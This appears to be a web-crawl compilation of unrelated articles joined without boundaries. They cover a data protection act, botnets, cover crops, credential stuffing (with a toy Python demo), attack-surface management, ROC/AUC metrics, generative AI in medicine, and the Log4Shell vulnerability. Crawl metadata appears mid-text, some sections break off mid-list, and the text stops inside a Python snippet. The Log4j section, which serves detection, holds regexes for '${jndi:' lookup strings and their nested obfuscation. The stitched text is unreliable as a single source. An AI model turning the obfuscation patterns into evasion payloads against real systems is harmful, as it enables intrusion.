A dedicated regulatory authority oversees the act’s implementation, ensuring that its tenets are adhered to. This body is not just a passive observer but has the power to conduct audits, investigations & impose sanctions when necessary.
Penalties for Noncompliance and Breaches:
Noncompliance with the act isn’t taken lightly. Organizations found in violation can face substantial penalties, which can be either a fixed amount or a percentage of their annual turnover, depending on the severity of the breach. This ensures that adhering to the act isn’t just a moral imperative but a financial one.
Mechanism for Reporting Violations:
Individual empowerment is a cornerstone of the act. If individuals feel that their data rights have been infringed upon, they can directly report violations to the regulatory authority. This provision ensures that organizations are held accountable not just by regulators but by the very people whose data they hold.
Impact on Businesses
As the world becomes increasingly digital, businesses find themselves in the unique position of both utilizing and being custodians of vast amounts of personal data. The Digital Personal Data Protection Act, while designed to protect individuals, also greatly impacts the business world. Here’s how:
Adapting Data Collection and Processing Methods:
With the introduction of the act, gone are the days where businesses could freely collect and use data without stringent guidelines. Now, every piece of personal data collected must have a clear purpose. This necessitates a more thoughtful and strategic approach to data collection and processing.
Businesses are now required to implement clear consent mechanisms, ensuring that data subjects are well-informed. Moreover, with the data minimization principle in play, businesses need to be precise about the data they collect, ensuring it’s strictly relevant to their operations or the services they provide.
Benefits for Businesses:While the act may seem like a hurdle initially, in the long run, it presents multiple benefits for businesses:
Trust & Reputation: In an age where data breaches and privacy concerns frequently make headlines, adherence to the act positions a business as trustworthy. This can be a unique selling proposition, fostering loyalty among customers and clients.
Operational Efficiency: With the mandate to collect only pertinent data, businesses can streamline their data storage and processing methods, leading to more efficient operations and potentially reducing costs.
Legal Compliance & Risk Mitigation: Avoiding hefty penalties and potential litigation can save a business not just money but its reputation. Adhering to the act acts as a shield against potential legal pitfalls related to data misuse.
Case Study: XYZ Corp:
XYZ Corp, a multinational tech company, initially grappled with the provisions of the Digital Personal Data Protection Act. Their vast data repositories contained information collected over years, much of which lacked clear consent records. The company took proactive steps, implementing a comprehensive data audit to assess and clean their databases. They introduced a clear consent mechanism for their users and streamlined their data collection processes, ensuring alignment with the act’s principles. The result? Not only did XYZ Corp successfully adhere to the act, but they also witnessed a 20% increase in user trust, as measured by their annual surveys, establishing them as industry leaders in data protection.
Comparing with Other Global Data Protection Acts
The Digital Personal Data Protection Act, while a significant step towards data protection, isn’t the only legislation of its kind. Let’s delve into how it aligns or deviates from other major data protection laws globally.
General Data Protection Regulation (GDPR):
Originating in the European Union, GDPR has set the gold standard for data protection worldwide. Both GDPR and the Digital Personal Data Protection Act emphasize individual rights, including the right to access, rectification & erasure. However, while GDPR has a broader scope covering all EU residents, the Digital Personal Data Protection Act might be more regionspecific. The fines and penalties under GDPR can be up to 4% of a company’s global annual turnover & it remains to be seen if the Digital Personal Data Protection Act matches this level of punitive measures.
California Consumer Privacy Act (CCPA):
While GDPR focuses extensively on user consent, CCPA, originating in California, USA, emphasizes the right to opt out of data sales. The Digital Personal Data Protection Act, in its essence, seems to incorporate principles from both, ensuring both clear consent mechanisms and offering data subjects the power to dictate how their data is used, especially concerning third party transactions or data sales.
Criticisms and Concerns
Every piece of legislation, no matter how comprehensive, will inevitably face criticisms and concerns from various stakeholders. The Digital Personal Data Protection Act is no exception.
Common Critiques of the Act:
Vague Definitions: Some critics argue that certain terms and provisions within the act are ambiguous. This lack of clarity can lead to confusion among businesses, potentially resulting in unintentional noncompliance.
Overburdensome for Small Businesses: While large corporations might have the resources to adapt quickly, smaller entities may find it challenging to overhaul their data practices in line with the act. The costs and manpower required for such compliance can be daunting for small-scale enterprises.
Potential for Overreach: There are concerns that the act might give the regulatory authority too much power, leading to potential misuse or overpenalization of businesses, especially in borderline violation cases.
Concerns about its Enforcement and Practicality:
Scalability of Enforcement: Given the vast number of digital entities operating today, there’s skepticism about the practicality of enforcing the act uniformly. How will the regulatory authority handle thousands, if not millions, of cases?
Inadequate Penalties: While some feel the act might be too strict, others believe the penalties aren’t stringent enough to deter significant data breaches, especially by large corporations that might view fines as just an operational cost.
In an era where data has been equated to oil in terms of its value, the Digital Personal Data Protection Act emerges as a beacon, guiding the murky waters of digital data handling and protection. Its significance cannot be overstated. As digital footprints expand and deepen, it’s crucial for legislation to keep pace, ensuring that individual rights aren’t trampled in the digital stampede.
For businesses, this act isn’t just another regulatory hurdle but an opportunity to build trust, streamline operations, and champion ethical data practices. Individuals, on the other hand, are equipped with more control over their digital selves, fostering a safer and more transparent digital ecosystem.
In the ever-evolving digital landscape, staying informed, vigilant, and proactive is not just recommended but imperative. The Digital Personal Data Protection Act is a step forward, but it’s up to businesses and individuals alike to walk that path, ensuring a balanced digital world where innovation thrives without compromising personal rights.
Frequently Asked Questions (FAQs)
1. What types of organisations fall under the purview of the act?
The act typically covers any organisation, be it public or private, that collects, processes, or stores personal digital data. This includes both online and offline entities.
2. How does the act affect small businesses?
While the act’s principles apply uniformly, its impact on small businesses might be more pronounced given the potential costs and changes required for compliance. However, many provisions, like the appointment of a Data Protection Officer (DPO), might have thresholds that exempt very small entities.
3. What steps should organisations start with to become compliant?
Organisations should begin with a comprehensive data audit to understand what data they hold and how it’s processed. Following this, they can identify areas of noncompliance and devise strategies to address them, including updating consent mechanisms, ensuring data minimization, and implementing clear data protection policies.
Medical records are generally inaccessible and hard to understand. In fact, if you were to try reading your own medical data, you might find that it’s almost as if it’s in a different language. A medical record can be riddled with cryptic phrases, acronyms and complex terms that mean nothing in the eyes of someone who didn’t study medicine for eight years.
The thought of a robot doctor stirs lots of emotions in people. And truth be told, a ton of mystery still surrounds just what will become of this technology. We are still years, if not decades, from a robot doctor being incorporated into the practice of healthcare.
More and more people are clamouring for the ability to communicate with their doctor through email and social media. In fact, a recent study from the Journal of General Internal Medicine reports that 37 percent of patients have emailed their doctor while 18 percent used Facebook to get in touch with their physician.
A Bot is a computer connected to the Internet that has been surreptitiously compromised with malicious logic to perform activities under the command and control of a remote administrator.
A Botnet is a collection of computers compromised by malicious code and controlled across a network.
A Bot Master is the controller of a botnet that, from a remote location, provides direction to the compromised computers in the botnet.
Bots and botnets are pieces of malware that can infiltrate your company through phishing attacks or through weak remote access protected only by a password without two-factor authentication. To protect against bots and botnets, SMB owners should always ensure they have the following:
The Importance of Cover Crops in Sustainable Agriculture
Cover crops have been lauded for their diverse benefits, which include soil health improvements, erosion prevention, and the natural mediation of pests and diseases. Beyond these, they are a vital component of a climate change mitigation strategy; the roots of cover crops dive deep into the soil profile, locking away carbon dioxide and reducing greenhouse gas emissions. The practice contributes significantly to the diversification of farmland ecosystems by providing habitats for a range of species. In spite of this, the trajectory of cover crop adoption seems to be flattening across the Midwest. This plateau represents a critical roadblock in the journey towards the widespread implementation of sustainable and resilient farming systems.
The situation is particularly stark given the bullish goals set by influential agricultural organizations committed to enhancing soil health through cover cropping. As we approach the deadlines for milestones proposed by entities like the Farmers for Soil Health and the Midwest Row Crop Collaborative, it’s becoming increasingly evident that reassessment of strategies and renewed effort are crucial to overturn the slowing momentum in cover crop adoption.
Analyzing the Slowdown in Adoption Rates
The USDA’s latest agricultural census uncovers a nuanced picture; amidst an overall decline, states such as Colorado and Wisconsin have seen a steady climb in the integration of cover crops. Conversely, the downturn in Kentucky and Tennessee is a stark reminder that across the Midwest, the adoption rates vary widely and are influenced by a complex mix of factors. These include economic incentives, access to information and education about the benefits of cover crops, and the role of government policy in supporting sustainable practices.
The stalling of growth in cover crop acreage raises critical questions regarding the effectiveness of outreach and education programs intended to encourage farmers to adopt these environmentally friendly practices. It also indicates that there may be significant barriers to adoption that have not been adequately addressed. Understanding and overcoming these obstacles are pivotal for not only advancing cover crop adoption but also for securing the environmental and agronomic benefits they offer.
Leveraging Data to Accelerate Adoption: The Role of OpTIS
In facing the challenge of stalled cover crop adoption rates, we look towards technological innovation for solutions—specifically the utility of the Operational Tillage Information System, or OpTIS. This resource plays an indispensable role in demystifying trends and furnishing stakeholders with actionable data. By accruing detailed insights through remote sensing, OpTIS facilitates informed decision making that can catalyze a reinvigorated movement toward the wide-scale implementation of cover crops.
Considering the disparities between the remote sensing data and Ag Census reports, the development of OpTIS version 5.0 is anticipated with eagerness, as it holds the potential to offer an elevated standard of precision. The importance of regular and reliable data cannot be overstated, as it acts as both a compass and a benchmark for the advancement of conservation practices.
OpTIS: A Multifaceted Tool for Diverse Stakeholders
The utilization of OpTIS extends beyond mere metrics and into tangible applications for a diverse pool of stakeholders within the agricultural domain. For researchers, the data serves as a cornerstone for environmental modeling, allowing for an analysis of the broader impact of conservation practices. Conservation groups leverage OpTIS data to structure their educational efforts, delivering outreach that underscores the pragmatic advantages and application of cover crops.
Government entities also find immense value in OpTIS. Its data steers conservation initiatives and informs policy, ensuring that regulatory frameworks promote sustainable agriculture. As the OpTIS project continues to evolve, the goal remains consistent: to ensure that decisions regarding agricultural conservation practices are supported by the most accurate and comprehensive data available.
Future Prospects: Funding and Path Forward
The significance of a tool like OpTIS has propelled efforts to secure ongoing funding for its operation well into the future. Amid a backdrop of public funding efforts—including the Inflation Reduction Act and the Partnerships for Climate-Smart Commodities—there is a concerted push to ensure that OpTIS remains a pivotal resource for tracking and encouraging the adoption of climate-smart practices like cover cropping.
In the fight to reinvigorate the adoption of cover crops across the Midwest, data-driven solutions will be at the forefront. Tools such as OpTIS, coupled with strong collaboration across the agricultural sector, are instrumental in overcoming the current slump. By providing clear, actionable insights, there is hope for realizing the full potential of cover crops in creating a resilient and sustainable agricultural future.
Credential stuffing is a method that cyber criminals use to break into online user accounts. It is done by utilizing previously stolen user credentials (passwords and usernames). With credential stuffing, hackers use the stolen data in bulk to try to break into other user accounts across the internet. When successful, credential stuffing can lead to account takeover. It can also lead to online identity theft, when criminals get their hands on personal information stored in online accounts.
Credential stuffing is what hackers do with stolen login credentials
Credential stuffing can only be done when criminals have successfully stolen login credentials from web services, companies, or organizations. Criminals can either steal the credentials themselves in data breaches or data leaks, or buy them from dark web marketplaces. After criminals have acquired the credentials, they start the process called credential stuffing.
They feed the stolen user credentials in bulk into other web services to see if they can access them with the same login credentials. They do this with the help of special programs, which speeds up the process significantly. Criminals can do this on as many sites as they want but usually target services that include payment information.
As Olli Bliss, cyber security expert from F-Secure explains, “Think of it as taking millions and millions of keys and trying to unlock doors. And these doors are sites and services we use every single day. It could be your Instagram account; it could be your Facebook account, or it could be your login to PayPal. So, cyber criminals are basically just trying to see which combination will unlock these services.”
This is possible because people reuse passwords
What makes credential stuffing possible is that people use the same passwords on multiple accounts. Credential stuffing is basically just testing whether the stolen login credentials can be used on other online accounts. If the login credentials are different from the stolen ones, hackers can’t get in, at least not by utilizing credential stuffing techniques.
It’s a well-known fact that most people reuse their passwords. And sure, it’s easy and convenient. But by doing so, web users make themselves an easy target for credential stuffing attacks. Because web users can’t prevent their login credentials from being exposed in data breaches and data leaks, their protection lies in securing their online user accounts.
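To make the mechanics concrete, here is a toy sketch (all names and passwords below are invented for illustration) showing how a single leaked credential pair unlocks every service where the password was reused:

```python
# Hypothetical leaked credential pair from a breached site.
leaked_email, leaked_password = "anna@example.com", "Summer2024!"

# Toy user databases for three hypothetical services. Passwords are kept
# in plaintext only for illustration; real services store salted hashes.
services = {
    "shop": {"anna@example.com": "Summer2024!"},   # reused -> falls
    "mail": {"anna@example.com": "Summer2024!"},   # reused -> falls
    "bank": {"anna@example.com": "k9#Lq!uniq42"},  # unique -> holds
}

# Credential stuffing in miniature: try the one stolen pair everywhere.
compromised = [
    name for name, users in services.items()
    if users.get(leaked_email) == leaked_password
]
```

In a real attack this loop runs over millions of stolen pairs and hundreds of sites, which is why a single reused password can expose many accounts.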
Here’s how you can secure your online accounts
Use unique and strong passwords
Using the same password, or just a few passwords, everywhere endangers all of your user accounts when one password gets compromised. Web criminals are well aware that most people reuse their passwords. When they successfully steal one, they will try it on many user accounts. When you use unique passwords, they can’t access your other accounts with just one stolen password. You can find more on this topic from this blog post. Store your passwords in a password manager for easy access and easier remembering.
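As a minimal sketch of what "unique and strong" means in practice, the snippet below generates a random password with Python's standard library (the length and character set are arbitrary choices for this example):

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    # Draw each character from letters, digits, and punctuation using a
    # cryptographically secure random source (the secrets module).
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))
```

A password manager does the same job for you and, crucially, also remembers a different result for every site.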
Use 2-factor authentication
2-factor authentication is a second barrier in addition to your password that protects your user account. It makes it a lot harder for criminals to use stolen user credentials. Read more about 2-factor authentication and how you can enable it from this blog post.
Get F-Secure ID PROTECTION password manager
F-Secure ID PROTECTION is a handy password manager. You can store and create unique and strong passwords and access them from any device. You can also use it to autofill your passwords when needed. Not only that, ID PROTECTION monitors your personal information online. When a service you use gets breached or a data leak is detected, you will receive an alert with expert guidance on what to do next. Try it for free, with no credit card required!
Watch Olli Bliss’ expert answer to the question from the video below.
Gartner research shows that attack surface expansion is the number one trend for increasing potential cyber threats. Not only that, but according to the Enterprise Strategy Group’s research report on security hygiene and posture management, nearly seven in ten (69%) organisations admit that they have experienced at least one cyber-attack that started through the exploit of an unknown, unmanaged, or poorly managed internet-facing asset. The reality is, cyberattacks aren’t going anywhere, and with many businesses permanently moving to remote and hybrid working conditions, threats are constantly increasing.
What is the attack surface?
A company’s attack surface is the sum of all possible security risk exposures in an organisation’s software environment. Essentially, it is all potential vulnerabilities, known and unknown, across all hardware, software and network components. It is crucial that companies are aware of their entire attack surface, allowing them to put sufficient security measures in place.
Attack surfaces can generally be categorised into three types. First, digital: the digital attack surface encompasses the entire network and software environment of an organisation, including applications, code, ports and other entry and exit points. Second, physical: this includes all of an organisation’s endpoint devices, such as desktop systems, laptops, mobile devices, IoT devices and USB ports. Third, social engineering: these attacks prey on the vulnerabilities of human users. The most common types of attacks against organisations include spear phishing and other techniques that deceive an employee into giving up vital company information.
Why companies need to be aware of their attack surface
As an organisation’s digital footprint rapidly expands, the risk created by exposed assets grows too. Recent trends such as digital transformation, hybrid work, Internet of Things (IoT) and more have led to the rapid expansion of many companies’ internet-facing assets, but unfortunately, their cybersecurity has not kept up with this expansion. Traditionally, workloads, websites, user credentials, storage and other invaluable business information were controlled by central, on-premise IT managers. But today, most digital assets are located outside the traditional enterprise perimeter. This means that their visibility and control have become limited. The result? A dramatic increase in many organisations’ risk profiles.
How companies can manage their own attack surface
The number one tactic companies can use to reduce the chance of a breach is to reduce their attack surface. This involves making sure a firewall is in place to limit the number of accessible TCP/IP ports, applying relevant security updates and patches, and limiting the amount of code that is exposed. On top of that, companies can limit access to customers or registered users and restrict administration or content-management modules. And finally, they can review all digital assets and disable unnecessary applications.
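As a tiny illustration of auditing accessible TCP ports, the sketch below performs a simple connect check using only the standard library (real inventories use dedicated scanners; this is only a teaching example):

```python
import socket

def is_port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    # A completed TCP handshake means something is listening on the port.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

# Demo: stand up a local listener on an ephemeral port so the check
# has a known-open target to report on.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen(1)
demo_port = listener.getsockname()[1]
```

Running such a check over a host's port range, and closing anything that does not need to be reachable, is the most direct form of attack surface reduction described above.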
Alternatively, companies can outsource their attack surface cybersecurity via Attack Surface Management (ASM) solutions. ASM is the continuous discovery, analysis, remediation and monitoring of the cybersecurity vulnerabilities and potential attack vectors that make up an organisation’s attack surface.
This enables security teams to establish a proactive security posture in the face of a constantly growing and morphing attack surface. ASM solutions provide real-time visibility into vulnerabilities and attack vectors as they emerge, allowing companies to stay one step ahead of threat actors at all times. It also allows them to close security gaps by employing an outside-in view of the enterprise attack surface. This empowers teams to prioritise and manage all exposed internet-facing assets.
What to look for in Attack Surface Management solutions
It is vital that businesses choose the correct and most effective ASM solution for their specific needs. The best solutions provide an outside-in view of the enterprise’s attack surface. This allows security teams to prioritise and manage all exposed internet-facing assets that are centralised or remote across on-premises environments, subsidiaries, cloud and third-party vendors, all with a zero-touch approach. It is also important to choose a solution that is backed by intelligence. Leading ASM solutions prioritise potential risks by leveraging industry-leading adversary intelligence to guide precise actions based on the most critical risks. They’ll also use a proprietary real-time 24/7 engine to scan the entire internet across the globe, enabling organisations to see how their attack surface looks from an adversary’s country-centric view. This provides a holistic view of every possible exposure and allows proactive prevention. Effective ASM solutions also automatically generate, for every identified risk, quick-to-implement, actionable remediation steps that IT and security teams can apply for real-time vulnerability mitigation.
How to protect your attack surface in 2023
Cybersecurity is a cat-and-mouse game, with adversaries’ techniques for finding exposed and vulnerable assets often outpacing an organisation’s ability to discover the problem. In general, adversaries often have a better sense of organisational risk exposure than the organisation itself. A thorough attack surface management solution can help teams keep a watchful eye over their digital perimeter. Constant, real-time asset management is essential to any thorough cyber security strategy, particularly as cyber attackers become more sophisticated in their methods of attack. Companies that do so are more likely to survive the cyberattack onslaught.
The ROC curve visualization (on the ROC Curve tab) helps you explore classification, performance, and statistics for a selected model. ROC curves plot the true positive rate against the false positive rate for a given data source.
Evaluate a model using the ROC curve¶
Select a model on the Leaderboard and navigate to Evaluate > ROC Curve.
The curve is highlighted with the following elements:
- Circle—Indicates the new threshold value. Each time you set a new display threshold, the position of the circle on the curve changes.
- Gray intercepts—Provides a visual reference for the selected threshold.
- 45 degree diagonal—Represents the "random" prediction model.
Analyze the ROC curve¶
View the ROC curve and consider the following:
ROC curve shape¶
Use the ROC curve to assess model quality. The curve, drawn based on each value in the dataset, plots the true positive rate against the false positive rate. Some takeaways from an ROC curve:
An ideal curve grows quickly for small x-values, and slows for values of x closer to 1.
The curve illustrates the tradeoff between sensitivity and specificity. An increase in sensitivity results in a decrease in specificity.
A "perfect" ROC curve yields a point in the top left corner of the chart (coordinate (0,1)), indicating no false negatives and no false positives (a high true positive rate and a low false positive rate).
The closer the curve comes to the 45-degree diagonal of the ROC space, the less accurate the model and closer it is to a random assignment model.
The shape of the curve is determined by the overlap of the classification distributions.
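The construction behind the plot can be sketched in a few lines of plain Python (illustrative only, unrelated to any DataRobot internals): sweep the candidate thresholds from high to low and record one (false positive rate, true positive rate) point at each:

```python
def roc_points(scores, labels):
    # labels are 0/1; one (FPR, TPR) point per distinct threshold,
    # sweeping thresholds from the highest score down to the lowest.
    p = sum(labels)
    n = len(labels) - p
    points = []
    for t in sorted(set(scores), reverse=True):
        tp = sum(1 for s, y in zip(scores, labels) if s >= t and y == 1)
        fp = sum(1 for s, y in zip(scores, labels) if s >= t and y == 0)
        points.append((fp / n, tp / p))
    return points
```

For a perfectly separating model the points climb straight up the left edge before moving right, matching the "top left corner" description above.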
Area under the ROC curve¶
The AUC (area under the curve) is literally the lower-right area under the ROC Curve.
AUC does not display automatically in the Metrics pane. Click Select metrics and select Area Under the Curve (AUC) to display it.
AUC is a metric for binary classification that considers all possible thresholds and summarizes performance in a single value, reported in the bottom right of the graph. The larger the area under the curve, the more accurate the model, however:
An AUC of 0.5 suggests that predictions based on this model are no better than a random guess.
An AUC of 1.0 suggests that predictions based on this model are perfect, and because a perfect model is highly uncommon, it is likely flawed (target leakage is a common cause of this result).
StackExchange provides an excellent explanation of AUC.
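As a hedged, library-free sketch of what the metric computes: AUC equals the probability that a randomly chosen positive example is scored above a randomly chosen negative one (the Mann-Whitney formulation), which can be checked directly on small data:

```python
def auc(scores, labels):
    # Fraction of (positive, negative) pairs ranked correctly,
    # counting ties as half a win.
    pos = [s for s, y in zip(scores, labels) if y == 1]
    neg = [s for s, y in zip(scores, labels) if y == 0]
    wins = sum((p > n) + 0.5 * (p == n) for p in pos for n in neg)
    return wins / (len(pos) * len(neg))
```

A model that ranks every positive above every negative scores 1.0; a model whose scores carry no information about the label scores about 0.5, matching the interpretations above.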
Kolmogorov-Smirnov (KS) metric¶
For binary classification projects, the KS optimization metric measures the maximum distance between two non-parametric (empirical) distributions: the predicted score distributions of the positive and negative classes.
The KS metric evaluates and ranks models based on the degree of separation between true positive and false positive distributions.
The KS metric does not display automatically in the Metrics pane. Click Select metrics and select Kolmogorov-Smirnov Score to display it.
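A minimal sketch of that computation (illustrative, not the product's implementation): the KS score is the largest gap between the empirical cumulative distributions of positive-class and negative-class scores, evaluated over the observed score values:

```python
def ks_statistic(scores, labels):
    pos = [s for s, y in zip(scores, labels) if y == 1]
    neg = [s for s, y in zip(scores, labels) if y == 0]

    def cdf(sample, x):
        # Empirical CDF: fraction of the sample at or below x.
        return sum(1 for v in sample if v <= x) / len(sample)

    return max(abs(cdf(pos, t) - cdf(neg, t)) for t in set(scores))
```

Fully separated classes give a KS of 1.0; heavily overlapping score distributions push it toward 0, which is why the metric ranks models by degree of separation.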
For a complete description of the Kolmogorov–Smirnov test (K–S test or KS test), see the Wikipedia article on the topic.
By: K. Sai Spoorthi, student, Department of Computer Science and Engineering, Madanapalle Institute of Technology and Science, 517325, Angallu, Andhra Pradesh.
Generative AI is bringing new solutions to the field of individualized medicine, especially in data handling, drug discovery, and the processing of genomic data. This paper describes the current and potential impact of generative AI on the efficacy and effectiveness of individualized therapy, its benefits for patients, and the possibility of better use of healthcare organizations’ resources. Generative AI can help develop individual treatment plans that take a patient’s genome, lifestyle, and environment into account. AI integration in drug discovery increases the rate at which new compounds are found, improves lead optimization, and reduces development time and costs. Predictive modelling and simulation with generative AI also help forecast drug interactions and efficacy, supporting the continued growth of tailored medicine. The paper also covers genomics, where artificial intelligence aids the interpretation of large biological datasets and decision-making within healthcare. Looking to generative AI’s future in personalized medicine, further advancements appear to be on the horizon for technology, healthcare, and the ethical field.
Keywords: generative artificial intelligence, precision medicine, GAN, VAE
Developing rapidly in recent years, generative AI has emerged as a strategic change agent in healthcare, particularly in personalized medicine. With generative AI, medicine can shift from the traditional one-size-fits-all approach toward treatments targeted to the individual patient, while also improving efficiency throughout the care process. This paradigm shift has the capacity to improve clinical results, patient satisfaction, and the utilization of resources within health institutions. To examine the relationship between generative AI and personalized medicine more closely, it is necessary to look both at the technology itself and at the ethical ramifications of such an approach. Understanding these dynamics offers a conceptual foundation for evaluating how generative AI will change the individualized model of healthcare and, therefore, enhance the efficiency of interventions.
Generative AI and its relevance to personalized medicine
The advent of generative AI constitutes a turning point in pharmacogenomics, as it provides unparalleled opportunities for data processing and analysis. Generative AI can apply advanced algorithms to large datasets to design treatments tailored to individual patient profiles. This level of personalization goes beyond previous approaches by considering the many parameters, genetic, lifestyle, and environmental, that make a patient unique, which greatly improves the accuracy of therapy choices. Additionally, generative AI’s capability to generate new chemical compounds and engineer candidate pharmaceutical agents makes it well suited to enhancing drug discovery while accounting for population heterogeneity. As a result, using generative AI in personalized medicine not only improves treatment outcomes and the patient experience but also supports the healthcare system’s broader goals of optimizing workflows and costs.
Applications of Generative AI in Drug Discovery
Progress in generative AI is already changing the context of drug development by improving the accuracy and speed of the methods used to discover new substances. Deep learning algorithms enable more accurate prediction of molecular properties and interactions, making lead optimization easier for researchers. Generative models can automatically propose chemical compounds that approach reference targets, rendering the search drastically more efficient than trial-and-error approaches in both time and cost. In addition, AI-driven approaches enable searches of an enormous chemical space, identifying compounds that could otherwise go unnoticed. This not only increases the pace of innovation but also raises the probability of finding effective treatment regimens for complicated diseases, leading to more evidence-based personalized medicine. Architectures such as generative adversarial networks (GANs) and variational autoencoders (VAEs) have become indispensable here, helping to address challenges such as data scarcity, privacy concerns, and the complexity of modelling human health data. The way generative AI and drug discovery reinforce one another makes continued investment and research in this area highly relevant.
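To give a flavour of the machinery behind the VAEs mentioned above, here is a minimal NumPy sketch of the reparameterization step and the KL regularizer (purely illustrative; a real molecular VAE wraps these in trained encoder and decoder networks):

```python
import numpy as np

rng = np.random.default_rng(0)

def reparameterize(mu, log_var):
    # z = mu + sigma * eps with eps ~ N(0, I): sampling stays
    # differentiable with respect to the encoder outputs mu and log_var.
    eps = rng.standard_normal(np.shape(mu))
    return mu + np.exp(0.5 * log_var) * eps

def kl_to_standard_normal(mu, log_var):
    # KL( N(mu, sigma^2) || N(0, I) ), summed over latent dimensions;
    # this term keeps the learned latent space close to a standard normal.
    return -0.5 * np.sum(1 + log_var - mu**2 - np.exp(log_var), axis=-1)
```

Sampling from that regularized latent space and decoding is how a generative model proposes novel candidate molecules.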
Enhancing drug design through predictive modelling and simulation
Advances in predictive modelling and simulation offer new opportunities in drug design, giving researchers instruments that improve both the outcomes and the productivity of the development process. Using generative AI models, scientists can recreate many interactions in the biological environment and make quite accurate forecasts of how individual compounds will behave once they interact with other chemical entities in the human body. This capability not only speeds up the identification of potential drug compounds but also helps refine those drugs before they are ever trialled in the clinic. Machine learning models additionally enable practitioners in their respective specialties to analyse massive datasets, improving decision-making. As the overall picture of personalized medicine expands, the value of these approaches emerges ever more clearly, placing them at the heart of the search for treatment tailored to the patient.
Generative AI in Genomic Data Analysis
Introducing generative AI into genomic data analysis is a revolutionary achievement in how researchers interpret complex biological information. Thanks to sophisticated algorithms, generative AI can create massive datasets, model genetic variations, and find hidden patterns in genomic sequences. This capability not only increases the speed of research but also improves the accuracy of genomic analysis, making it better suited to drug treatment and the customization of therapies in the developing area of personalized medicine. For example, generative models can mimic the phenotypic consequences of different genomic modifications, supporting deeper prognoses of disease processes and possible treatment outcomes. Furthermore, because AI systems are versatile in coping with multiple and complex forms of genomic information, they stand to play a huge role in decision-making analytics and risk assessment, informing clinical decisions and improving patient-specific care. This evolution shows the important intersection of technology and biology, creating a map for new ways of making treatment available to the patient.
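The generative step of such models is easy to illustrate. The sketch below assumes an already trained VAE decoder (here replaced by random, untrained weights purely for illustration), samples latent vectors from a standard normal distribution, and decodes them into synthetic binary genotype vectors. All names and dimensions are invented for the example.

```python
import math
import random

random.seed(0)

LATENT_DIM = 8   # size of the latent code z (illustrative)
N_SNPS = 20      # number of genotype positions per synthetic sample (illustrative)

# Untrained, randomly initialised decoder weights -- purely illustrative.
W = [[random.gauss(0, 0.5) for _ in range(N_SNPS)] for _ in range(LATENT_DIM)]
b = [0.0] * N_SNPS

def decode(z):
    """Map a latent vector z to per-SNP probabilities, then sample 0/1 alleles."""
    genotype = []
    for j in range(N_SNPS):
        logit = b[j] + sum(z[i] * W[i][j] for i in range(LATENT_DIM))
        p = 1.0 / (1.0 + math.exp(-logit))   # sigmoid
        genotype.append(1 if random.random() < p else 0)
    return genotype

def sample_synthetic_genomes(n):
    """Draw z ~ N(0, I) and decode -- the generative step of a trained VAE."""
    return [decode([random.gauss(0, 1) for _ in range(LATENT_DIM)]) for _ in range(n)]

synthetic = sample_synthetic_genomes(5)
```

In a real pipeline the decoder weights would come from training on actual genomic data, and the generated samples would be validated against the statistics of the source cohort.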
Conclusion and Future of Generative AI in advancing personalized medicine
The incorporation of generative AI into precision medicine is a revolutionary improvement in healthcare that is worth discussing: it supports the development of targeted interventions aimed at improving patient outcomes. As the inexorable progress of technology merges with medicine, generative AI can analyse and combine enormous databases and supply the evidence for a client-centred approach, so that both the predicted benefit of an intervention and its suitability for each patient become much clearer. Decision-making becomes contingent on the forecasted probability that an intervention will be beneficial and on the likelihood of risk; machine learning algorithms help healthcare providers make better decisions by predicting not only efficacy but also potential side effects. At the same time, there are ethical questions such as data privacy and bias, and stakeholders should establish proper rules to protect patients and regulate the application of AI in the health sector. The future of personalized medicine is contingent on bringing together experts from technology, clinical practice, and ethics to refine these instruments and create a new, groundbreaking paradigm of health care.
Spoorthi K.S. (2024) Generative AI in Personalized Medicine, Insights2Techinfo, pp.1 | <urn:uuid:7e2645a2-1270-4eaf-ae68-bc5adc62d0d8> | CC-MAIN-2024-38 | https://insights2techinfo.com/generative-ai-in-personalized-medicine/ | 2024-09-07T14:45:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00087.warc.gz | en | 0.894233 | 2,530 | 2.671875 | 3 |
A recently discovered vulnerability in the popular Log4j software has given hackers a field day while leaving the cybersecurity community scrambling. Log4j is a Java logging library used by millions of websites and apps, including Apple iCloud, Amazon Web Services, and Minecraft. Experts estimate that attempts to exploit the code number in the hundreds of thousands, or even millions.
Jen Easterly, U.S. Cybersecurity and Infrastructure Security Agency (CISA) director, commented, “The Log4j vulnerability is the most serious vulnerability I have seen in my decades-long career.”
What is Log4j?
Log4j is open-source software provided by the Apache Software Foundation, ubiquitous to many operating systems. The software records system events and communicates them to administrators and users.
For example, if you type the wrong web address, you receive a 404-error message saying the page you are looking for does not exist. The web server uses Log4j to record that event and transmit it to system administrators.
Log4Shell: The Log4j Vulnerability
Log4Shell, the zero-day vulnerability in Log4j, stems from a feature that lets users embed custom lookup code when formatting a log message. If there were no malicious actors in the world, that would be fine. But what happens when hackers discover that they can craft such custom code? They can send it to targeted computers to steal personal information, take control of the system, and more.
For example, hackers can trigger log messages (like the 404-error message) that include malicious content. Log4j will process the message, creating a reverse shell and allowing hackers to gain remote control of the server.
So far, there have been reports of hackers installing cryptocurrency mining software on hacked computers, ransomware attacks on Minecraft users, and geopolitical enemies breaching each other’s government agencies and businesses.
Why Are the Challenges of Log4Shell So Significant?
Several aspects of Log4Shell make it very serious. First, Log4j software is incredibly widespread. It is not like the lock of one door is broken, but the locks of millions of doors.
Second, Log4j is often bundled with other software, so some system administrators do not even know their systems use it. Cybersecurity experts have been working around the clock just to ascertain whether their clients have Log4j in their systems.
For now, CISA has announced the release of a scanner that can identify web services impacted by certain Log4j remote code. That will help companies who are not aware of their digital assets, but not those whose data has been compromised.
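At their simplest, such scanners look for the `${jndi:...}` lookup string (and its common obfuscations) in logs and HTTP headers. The sketch below is a deliberately minimal illustration of that idea, not a substitute for CISA's tooling; real scanners handle many more evasion tricks, and the sample log lines are invented.

```python
import re

# Plain lookup string, e.g. ${jndi:ldap://...}
PLAIN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any nested lookup, e.g. ${${lower:j}ndi:...} -- a common obfuscation trick.
NESTED = re.compile(r"\$\{[^}]*\$\{")

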